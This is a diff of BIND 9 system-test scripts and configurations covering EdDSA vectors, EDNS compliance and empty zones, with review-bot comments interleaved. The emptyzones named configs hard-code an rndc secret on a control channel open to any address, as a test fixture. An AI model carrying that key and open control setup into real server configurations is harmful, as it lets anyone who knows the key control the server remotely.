echo_i "failed"; fi + status=$((status+ret)) + + # Check test vectors (RFC 8080 + errata) + n=$((n+1)) + echo_i "checking that Ed25519 test vectors match ($n)" + ret=0 + grep 'oL9krJun7xfBOIWcGHi7mag5/hdZrKWw15jP' ns2/example.com.db.signed > /dev/null || ret=1 + grep 'VrbpMngwcrqNAg==' ns2/example.com.db.signed > /dev/null || ret=1 + grep 'zXQ0bkYgQTEFyfLyi9QoiY6D8ZdYo4wyUhVi' ns2/example.com.db.signed > /dev/null || ret=1 + grep 'R0O7KuI5k2pcBg==' ns2/example.com.db.signed > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "algorithm Ed25519 not supported, skipping vectors match test" +fi + +if [ -f ed448-supported.file ]; then + # Check the example. domain + n=$((n+1)) + echo_i "checking that Ed448 positive validation works ($n)" + ret=0 + dig_with_opts . @10.53.0.1 soa > dig.out.ns1.test$n || ret=1 + dig_with_opts . 
@10.53.0.3 soa > dig.out.ns3.test$n || ret=1 + $PERL ../digcomp.pl dig.out.ns1.test$n dig.out.ns3.test$n || ret=1 + grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + # Check test vectors (RFC 8080 + errata) + n=$((n+1)) + echo_i "checking that Ed448 test vectors match ($n)" + ret=0 + grep '3cPAHkmlnxcDHMyg7vFC34l0blBhuG1qpwLm' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'jInI8w1CMB29FkEAIJUA0amxWndkmnBZ6SKi' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'wZSAxGILn/NBtOXft0+Gj7FSvOKxE/07+4RQ' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'vE581N3Aj/JtIyaiYVdnYtyMWbSNyGEY2213' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'WKsJlwEA' ns3/example.com.db.signed > /dev/null || ret=1 + + grep 'E1/oLjSGIbmLny/4fcgM1z4oL6aqo+izT3ur' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'CyHyvEp4Sp8Syg1eI+lJ57CSnZqjJP41O/9l' ns3/example.com.db.signed > /dev/null || ret=1 + grep '4m0AsQ4f7qI1gVnML8vWWiyW2KXhT9kuAICU' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'Sxv5OWbf81Rq7Yu60npabODB0QFPb/rkW3kU' ns3/example.com.db.signed > /dev/null || ret=1 + grep 'ZmQ0YQUA' ns3/example.com.db.signed > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "algorithm Ed448 not supported, skipping vectors match test" +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/ednscompliance/clean.sh b/bin/tests/system/ednscompliance/clean.sh new file mode 100644 index 0000000..ad6176a --- /dev/null +++ b/bin/tests/system/ednscompliance/clean.sh 
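Review bot: The comment `# Check the example. domain` in eddsa/tests.sh sits above queries for the root zone (`dig_with_opts . @10.53.0.1 soa`) in both the Ed25519 and the Ed448 branch; `# Check validation of the signed root zone` would match what actually runs. The two skip messages name only the "vectors match test" although the whole branch, including the positive-validation check, is skipped. As a matter of style, the vector checks hand fixed base64 fragments to `grep` as patterns; `grep -F` would state that they are literal strings.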
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.out*
+rm -f ns*/named.lock
+rm -f ns*/named.conf
+rm -f ns*/named.run
+rm -f ns*/named.memstats
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/ednscompliance/ns1/named.conf.in b/bin/tests/system/ednscompliance/ns1/named.conf.in
new file mode 100644
index 0000000..07aaf21
--- /dev/null
+++ b/bin/tests/system/ednscompliance/ns1/named.conf.in
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/ednscompliance/ns1/root.db b/bin/tests/system/ednscompliance/ns1/root.db
new file mode 100644
index 0000000..f9bfbe9
--- /dev/null
+++ b/bin/tests/system/ednscompliance/ns1/root.db
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA marka.isc.org. a.root.servers.nil. (
+ 2010 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.6
diff --git a/bin/tests/system/ednscompliance/setup.sh b/bin/tests/system/ednscompliance/setup.sh
new file mode 100644
index 0000000..e46affa
--- /dev/null
+++ b/bin/tests/system/ednscompliance/setup.sh
@@ -0,0 +1,17 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
diff --git a/bin/tests/system/ednscompliance/tests.sh b/bin/tests/system/ednscompliance/tests.sh
new file mode 100644
index 0000000..27e46df
--- /dev/null
+++ b/bin/tests/system/ednscompliance/tests.sh
@@ -0,0 +1,113 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+norec -p ${PORT}" + +status=0 +n=0 +zone=. + +n=`expr $n + 1` +echo_i "check +edns=100 sets version 100 ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +qr +edns=100 soa $zone > dig.out$n +grep "EDNS: version: 100," dig.out$n > /dev/null || { ret=1; reason="version"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +ret=0 reason= +echo_i "check +ednsopt=100 adds option 100 ($n)" +$DIG $DIGOPTS @10.53.0.1 +qr +ednsopt=100 soa $zone > dig.out$n +grep "; OPT=100" dig.out$n > /dev/null || { ret=1; reason="option"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check +ednsflags=0x80 sets flags to 0x0080 ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +qr +ednsflags=0x80 soa $zone > dig.out$n +grep "MBZ: 0x0080," dig.out$n > /dev/null || { ret=1; reason="flags"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Unknown EDNS version ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +edns=100 +noednsnegotiation soa $zone > dig.out$n +grep "status: BADVERS," dig.out$n > /dev/null || { ret=1; reason="status"; } +grep "EDNS: version: 0," dig.out$n > /dev/null || { ret=1; reason="version"; } +grep "IN.SOA." 
dig.out$n > /dev/null && { ret=1; reason="soa"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Unknown EDNS option ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +ednsopt=100 soa $zone > dig.out$n +grep "status: NOERROR," dig.out$n > /dev/null || { ret=1; reason="status"; } +grep "EDNS: version: 0," dig.out$n > /dev/null || { ret=1; reason="version"; } +grep "; OPT=100" dig.out$n > /dev/null && { ret=1; reason="option"; } +grep "IN.SOA." dig.out$n > /dev/null || { ret=1; reason="nosoa"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Unknown EDNS version + option ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +edns=100 +noednsneg +ednsopt=100 soa $zone > dig.out$n +grep "status: BADVERS," dig.out$n > /dev/null || { ret=1; reason="status"; } +grep "EDNS: version: 0," dig.out$n > /dev/null || { ret=1; reason="version"; } +grep "; OPT=100" dig.out$n > /dev/null && { ret=1; reason="option"; } +grep "IN.SOA." dig.out$n > /dev/null && { ret=1; reason="soa"; } +if [ $ret != 0 ]; then echo_i "failed: $reason"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "Unknown EDNS flag ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +ednsflags=0x80 soa $zone > dig.out$n +grep "status: NOERROR," dig.out$n > /dev/null || { ret=1; reason="status"; } +grep "EDNS: version: 0," dig.out$n > /dev/null || { ret=1; reason="version"; } +grep "EDNS:.*MBZ" dig.out$n > /dev/null > /dev/null && { ret=1; reason="mbz"; } +grep ".IN.SOA." 
dig.out$n > /dev/null || { ret=1; reason="nosoa"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "Unknown EDNS version + flag ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +edns=100 +noednsneg +ednsflags=0x80 soa $zone > dig.out$n +grep "status: BADVERS," dig.out$n > /dev/null || { ret=1; reason="status"; } +grep "EDNS: version: 0," dig.out$n > /dev/null || { ret=1; reason="version"; } +grep "EDNS:.*MBZ" dig.out$n > /dev/null > /dev/null && { ret=1; reason="mbz"; } +grep "IN.SOA." dig.out$n > /dev/null && { ret=1; reason="soa"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "DiG's EDNS negotiation ($n)" +ret=0 reason= +$DIG $DIGOPTS @10.53.0.1 +edns=100 soa $zone > dig.out$n +grep "status: NOERROR," dig.out$n > /dev/null || { ret=1; reason="status"; } +grep "EDNS: version: 0," dig.out$n > /dev/null || { ret=1; reason="version"; } +grep "IN.SOA." dig.out$n > /dev/null || { ret=1; reason="soa"; } +if [ $ret != 0 ]; then echo_i "failed $reason"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/emptyzones/clean.sh b/bin/tests/system/emptyzones/clean.sh new file mode 100644 index 0000000..c7ff161 --- /dev/null +++ b/bin/tests/system/emptyzones/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns1/named.conf +rm -f ns*/named.lock +rm -f ns*/named.run +rm -f ns*/named.memstats +rm -f dig.out.test* +rm -f ns*/managed-keys.bind* 
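Review bot: The two `grep "EDNS:.*MBZ"` checks, in the "Unknown EDNS flag" and "Unknown EDNS version + flag" cases, redirect stdout twice (`> /dev/null > /dev/null`); the second redirect is redundant and the lines should read `grep "EDNS:.*MBZ" dig.out$n > /dev/null && { ret=1; reason="mbz"; }`. The script is also inconsistent in form: some cases bump `n` before `echo_i` and others after `status=...`, one failure message is `"failed: $reason"` while the rest are `"failed $reason"`, and the SOA pattern is `".IN.SOA."` in one case and `"IN.SOA."` elsewhere. None of the `$DIG` invocations has its exit status checked, so a dig that fails to run is only reported indirectly through the `status:` grep; appending `|| ret=1` to those lines would make the cause visible in the log.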
diff --git a/bin/tests/system/emptyzones/ns1/empty.db b/bin/tests/system/emptyzones/ns1/empty.db
new file mode 100644
index 0000000..70dbcaf
--- /dev/null
+++ b/bin/tests/system/emptyzones/ns1/empty.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 SOA . . 0 0 0 0 0
+@ 0 NS .
diff --git a/bin/tests/system/emptyzones/ns1/named1.conf.in b/bin/tests/system/emptyzones/ns1/named1.conf.in
new file mode 100644
index 0000000..2cf1286
--- /dev/null
+++ b/bin/tests/system/emptyzones/ns1/named1.conf.in
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ algorithm hmac-sha256;
+ secret "1234abcd8765";
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.1 dscp 1;
+ notify-source 10.53.0.1 dscp 2;
+ transfer-source 10.53.0.1 dscp 3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion yes;
+ deny-answer-addresses { 192.0.2.0/24; 2001:db8:beef::/48; }
+ except-from { "example.org"; };
+ deny-answer-aliases { "example.org"; }
+ except-from { "goodcname.example.net";
+ "gooddname.example.net"; };
+ allow-query {!10.53.0.8; any; };
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
+
+include "rfc1918.zones";
diff --git a/bin/tests/system/emptyzones/ns1/named2.conf.in b/bin/tests/system/emptyzones/ns1/named2.conf.in
new file mode 100644
index 0000000..f62cfc9
--- /dev/null
+++ b/bin/tests/system/emptyzones/ns1/named2.conf.in
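Review bot: The `key rndc_key` block commits the secret `"1234abcd8765"` in clear text and the `controls` statement accepts it from `allow { any; }`, yet nothing in the file marks this as a fixture. Presumably the key has to match the harness's common/rndc.conf (that file is not in this view), so the value itself can stay, but a comment above the `key` statement would stop the block being copied into a real configuration: `/* Test fixture only: fixed rndc key for the system-test harness on 10.53.0.x; never reuse this key or "allow { any; }" on a deployed server. */`. The same key and `allow { any; }` pair appears in emptyzones/ns1/named2.conf.in and in the fetchlimit ns2/named.conf.in and ns3/named1.conf.in, named2.conf.in and named3.conf.in hunks, which would take the same comment.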
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ algorithm hmac-sha256;
+ secret "1234abcd8765";
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.1 dscp 1;
+ notify-source 10.53.0.1 dscp 2;
+ transfer-source 10.53.0.1 dscp 3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion yes;
+ deny-answer-addresses { 192.0.2.0/24; 2001:db8:beef::/48; }
+ except-from { "example.org"; };
+ deny-answer-aliases { "example.org"; }
+ except-from { "goodcname.example.net";
+ "gooddname.example.net"; };
+ allow-query {!10.53.0.8; any; };
+ allow-transfer { none; };
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
+
+zone "1.10.in-addr.arpa" {
+ type primary; file "empty.db";
+};
diff --git a/bin/tests/system/emptyzones/ns1/rfc1918.zones b/bin/tests/system/emptyzones/ns1/rfc1918.zones
new file mode 100644
index 0000000..07858f9
--- /dev/null
+++ b/bin/tests/system/emptyzones/ns1/rfc1918.zones
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "10.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "16.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "17.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "18.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "19.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "20.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "21.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "22.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "23.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "24.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "25.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "26.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "27.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "28.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "29.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "30.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "31.172.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+zone "168.192.IN-ADDR.ARPA" { type primary; file "empty.db"; };
+
diff --git a/bin/tests/system/emptyzones/ns1/root.hint b/bin/tests/system/emptyzones/ns1/root.hint
new file mode 100644
index 0000000..993227d
--- /dev/null
+++ b/bin/tests/system/emptyzones/ns1/root.hint
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.2
diff --git a/bin/tests/system/emptyzones/setup.sh b/bin/tests/system/emptyzones/setup.sh
new file mode 100644
index 0000000..df9d8f3
--- /dev/null
+++ b/bin/tests/system/emptyzones/setup.sh
@@ -0,0 +1,18 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+copy_setports ns1/named1.conf.in ns1/named.conf
diff --git a/bin/tests/system/emptyzones/tests.sh b/bin/tests/system/emptyzones/tests.sh
new file mode 100644
index 0000000..e2ee0fd
--- /dev/null
+++ b/bin/tests/system/emptyzones/tests.sh
@@ -0,0 +1,45 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+DIGOPTS="-p ${PORT}"
+RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s"
+
+status=0
+n=0
+
+n=`expr $n + 1`
+echo_i "check that switching to automatic empty zones works ($n)"
+ret=0
+rndc_reload ns1 10.53.0.1
+
+copy_setports ns1/named2.conf.in ns1/named.conf
+$RNDCCMD 10.53.0.1 reload > /dev/null || ret=1
+sleep 5
+
+$DIG $DIGOPTS +vc version.bind txt ch @10.53.0.1 > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "check that allow-transfer { none; } works ($n)"
+ret=0
+$DIG $DIGOPTS axfr 10.in-addr.arpa @10.53.0.1 +all > dig.out.test$n || ret=1
+grep "status: REFUSED" dig.out.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/feature-test.c b/bin/tests/system/feature-test.c
new file mode 100644
index 0000000..e502ee9
--- /dev/null
+++ b/bin/tests/system/feature-test.c
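Review bot: The reload that actually switches configurations is issued as `$RNDCCMD 10.53.0.1 reload > /dev/null || ret=1` followed by a fixed `sleep 5`, so both checks after it depend on named finishing the reload within five seconds. The script already calls the `rndc_reload` helper three lines earlier; if that helper waits for completion (its definition in conf.sh is not part of this hunk), calling `rndc_reload ns1 10.53.0.1` after `copy_setports` would remove the timing assumption. The first check also only proves that named still answers `version.bind` after the switch, so a comment such as `# named must still answer after the explicit RFC 1918 zones are replaced by automatic empty zones` would state what is really being asserted.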
@@ -0,0 +1,241 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#include <limits.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <unistd.h> + +#include <isc/md.h> +#include <isc/net.h> +#include <isc/print.h> +#include <isc/util.h> + +#include <dns/edns.h> + +#ifdef WIN32 +#include <Winsock2.h> +#endif /* ifdef WIN32 */ + +#ifndef _POSIX_HOST_NAME_MAX +#define _POSIX_HOST_NAME_MAX 255 +#endif + +static void +usage() { + fprintf(stderr, "usage: feature-test <arg>\n"); + fprintf(stderr, "args:\n"); + fprintf(stderr, "\t--edns-version\n"); + fprintf(stderr, "\t--enable-dnsrps\n"); + fprintf(stderr, "\t--enable-dnstap\n"); + fprintf(stderr, "\t--gethostname\n"); + fprintf(stderr, "\t--gssapi\n"); + fprintf(stderr, "\t--have-dlopen\n"); + fprintf(stderr, "\t--have-geoip2\n"); + fprintf(stderr, "\t--have-json-c\n"); + fprintf(stderr, "\t--have-libxml2\n"); + fprintf(stderr, "\t--ipv6only=no\n"); + fprintf(stderr, "\t--md5\n"); + fprintf(stderr, "\t--tsan\n"); + fprintf(stderr, "\t--with-dlz-filesystem\n"); + fprintf(stderr, "\t--with-idn\n"); + fprintf(stderr, "\t--with-lmdb\n"); + fprintf(stderr, "\t--with-zlib\n"); +} + +int +main(int argc, char **argv) { + if (argc != 2) { + usage(); + return (1); + } + + if (strcmp(argv[1], "--edns-version") == 0) { +#ifdef DNS_EDNS_VERSION + printf("%d\n", DNS_EDNS_VERSION); +#else /* ifdef DNS_EDNS_VERSION */ + printf("0\n"); +#endif /* ifdef DNS_EDNS_VERSION */ + return (0); + } + + if (strcmp(argv[1], "--enable-dnsrps") == 0) { +#ifdef USE_DNSRPS + return (0); +#else /* ifdef USE_DNSRPS */ + return (1); +#endif /* 
ifdef USE_DNSRPS */ + } + + if (strcmp(argv[1], "--enable-dnstap") == 0) { +#ifdef HAVE_DNSTAP + return (0); +#else /* ifdef HAVE_DNSTAP */ + return (1); +#endif /* ifdef HAVE_DNSTAP */ + } + + if (strcmp(argv[1], "--gethostname") == 0) { + char hostname[_POSIX_HOST_NAME_MAX + 1]; + int n; +#ifdef WIN32 + /* From InitSocket() */ + WORD wVersionRequested; + WSADATA wsaData; + int err; + + wVersionRequested = MAKEWORD(2, 0); + err = WSAStartup(wVersionRequested, &wsaData); + if (err != 0) { + fprintf(stderr, "WSAStartup() failed: %d\n", err); + exit(1); + } +#endif /* ifdef WIN32 */ + + n = gethostname(hostname, sizeof(hostname)); + if (n == -1) { + perror("gethostname"); + return (1); + } + fprintf(stdout, "%s\n", hostname); +#ifdef WIN32 + WSACleanup(); +#endif /* ifdef WIN32 */ + return (0); + } + + if (strcmp(argv[1], "--gssapi") == 0) { +#if defined(GSSAPI) + return (0); +#else /* if defined(GSSAPI) */ + return (1); +#endif /* if defined(GSSAPI) */ + } + + if (strcmp(argv[1], "--have-dlopen") == 0) { +#if defined(HAVE_DLOPEN) && defined(ISC_DLZ_DLOPEN) + return (0); +#else /* if defined(HAVE_DLOPEN) && defined(ISC_DLZ_DLOPEN) */ + return (1); +#endif /* if defined(HAVE_DLOPEN) && defined(ISC_DLZ_DLOPEN) */ + } + + if (strcmp(argv[1], "--have-geoip2") == 0) { +#ifdef HAVE_GEOIP2 + return (0); +#else /* ifdef HAVE_GEOIP2 */ + return (1); +#endif /* ifdef HAVE_GEOIP2 */ + } + + if (strcmp(argv[1], "--have-json-c") == 0) { +#ifdef HAVE_JSON_C + return (0); +#else /* ifdef HAVE_JSON_C */ + return (1); +#endif /* ifdef HAVE_JSON_C */ + } + + if (strcmp(argv[1], "--have-libxml2") == 0) { +#ifdef HAVE_LIBXML2 + return (0); +#else /* ifdef HAVE_LIBXML2 */ + return (1); +#endif /* ifdef HAVE_LIBXML2 */ + } + + if (strcmp(argv[1], "--ipv6only=no") == 0) { +#ifdef WIN32 + return (0); +#elif defined(IPPROTO_IPV6) && defined(IPV6_V6ONLY) + int s; + int n = -1; + int v6only = -1; + socklen_t len = sizeof(v6only); + + s = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); + if (s >= 0) 
{ + n = getsockopt(s, IPPROTO_IPV6, IPV6_V6ONLY, + (void *)&v6only, &len); + close(s); + } + return ((n == 0 && v6only == 0) ? 0 : 1); +#else /* ifdef WIN32 */ + return (1); +#endif /* ifdef WIN32 */ + } + + if (strcmp(argv[1], "--md5") == 0) { + unsigned char digest[ISC_MAX_MD_SIZE]; + const unsigned char test[] = "test"; + unsigned int size = sizeof(digest); + + if (isc_md(ISC_MD_MD5, test, sizeof(test), digest, &size) == + ISC_R_SUCCESS) + { + return (0); + } else { + return (1); + } + } + + if (strcmp(argv[1], "--tsan") == 0) { +#if defined(__has_feature) +#if __has_feature(thread_sanitizer) + return (0); +#endif +#endif +#if __SANITIZE_THREAD__ + return (0); +#else + return (1); +#endif + } + + if (strcmp(argv[1], "--with-dlz-filesystem") == 0) { +#ifdef DLZ_FILESYSTEM + return (0); +#else /* ifdef DLZ_FILESYSTEM */ + return (1); +#endif /* ifdef DLZ_FILESYSTEM */ + } + + if (strcmp(argv[1], "--with-idn") == 0) { +#ifdef HAVE_LIBIDN2 + return (0); +#else /* ifdef HAVE_LIBIDN2 */ + return (1); +#endif /* ifdef HAVE_LIBIDN2 */ + } + + if (strcmp(argv[1], "--with-lmdb") == 0) { +#ifdef HAVE_LMDB + return (0); +#else /* ifdef HAVE_LMDB */ + return (1); +#endif /* ifdef HAVE_LMDB */ + } + + if (strcmp(argv[1], "--with-zlib") == 0) { +#ifdef HAVE_ZLIB + return (0); +#else /* ifdef HAVE_ZLIB */ + return (1); +#endif /* ifdef HAVE_ZLIB */ + } + + fprintf(stderr, "unknown arg: %s\n", argv[1]); + usage(); + return (1); +} diff --git a/bin/tests/system/fetchlimit/ans4/ans.pl b/bin/tests/system/fetchlimit/ans4/ans.pl new file mode 100644 index 0000000..5a265c4 --- /dev/null +++ b/bin/tests/system/fetchlimit/ans4/ans.pl 
